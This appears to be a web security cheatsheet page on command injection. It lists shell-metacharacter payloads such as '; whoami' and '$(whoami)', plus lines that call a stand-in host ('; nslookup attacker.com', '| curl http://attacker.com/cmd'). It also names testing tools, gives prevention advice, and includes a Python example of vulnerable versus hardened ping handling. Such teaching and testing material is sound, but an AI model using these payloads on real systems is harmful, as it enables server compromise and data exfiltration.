Command Injection

Web cheatsheet — Web application enumeration and exploitation techniques.

Overview

Command Injection is an attack where arbitrary commands are executed on the host operating system via a vulnerable application. It occurs when user input is passed to system-level commands without proper sanitization.

Command injection can lead to complete server compromise, data exfiltration, and lateral movement within the target environment.

Category: Web

Key Commands & Payloads

The following commands and payloads are commonly used when testing for or exploiting Command Injection:

; whoami
| whoami
|| whoami
&& whoami
`whoami`
$(whoami)
; sleep 5
| ping -c 5 127.0.0.1
; nslookup attacker.com
| curl http://attacker.com/cmd

Tools & Techniques

Recommended tools for Command Injection:

  • Commix: automated command injection detection
  • Burp Suite: intercept and modify vulnerable parameters
  • Check parameters: ping, traceroute, nslookup, host, whois, dig, curl, wget, exec

Prevention & Mitigation

Security recommendations to prevent Command Injection:

  • Use parameterized APIs instead of system command execution
  • Validate and sanitize all user input against allowlists
  • Apply the principle of least privilege for application processes
  • Use security libraries that escape shell metacharacters
  • Implement Web Application Firewall (WAF) rules
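An added example (not part of the original cheatsheet) in Python showing the defect the prevention list addresses: a ping-style endpoint that splices user input into a shell command line, beside a hardened version that validates the host against an allowlist pattern and passes arguments as a list with no shell involved. Function names such as `ping_unsafe_command` and the host pattern are assumptions for illustration.

```python
import re
import subprocess
from typing import List

# Allowlist: plain hostnames and IPv4 literals only (letters, digits, dots, hyphens).
# Every metacharacter from the payload list above (; | & ` $ newline) is excluded.
HOST_RE = re.compile(r"^[A-Za-z0-9.-]{1,253}$")


def ping_unsafe_command(host: str) -> str:
    """Vulnerable pattern: user input concatenated into a shell command string.
    Returns the line the application would hand to /bin/sh via shell=True
    (not executed here)."""
    return "ping -c 1 " + host


def shell_would_run_extra_command(cmdline: str) -> bool:
    """Rough indicator of the problem: any shell metacharacter in the assembled
    line lets one intended command become several."""
    return any(ch in cmdline for ch in ";|&`$\n")


def is_allowed_host(host: str) -> bool:
    """Allowlist validation: True only for a plain hostname or IPv4 literal."""
    return HOST_RE.fullmatch(host) is not None


def ping_safe_argv(host: str) -> List[str]:
    """Hardened pattern: validate first, then build an argv list. With shell=False
    the host is a single argument to ping and no shell ever parses it."""
    if not is_allowed_host(host):
        raise ValueError("rejected host: %r" % host)
    return ["ping", "-c", "1", host]


def run_ping(host: str) -> int:
    """Run the hardened form (hypothetical endpoint handler). shell=False means
    metacharacters in the argument are never interpreted by a shell."""
    return subprocess.run(ping_safe_argv(host), check=False, timeout=10).returncode
```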

References

Additional resources: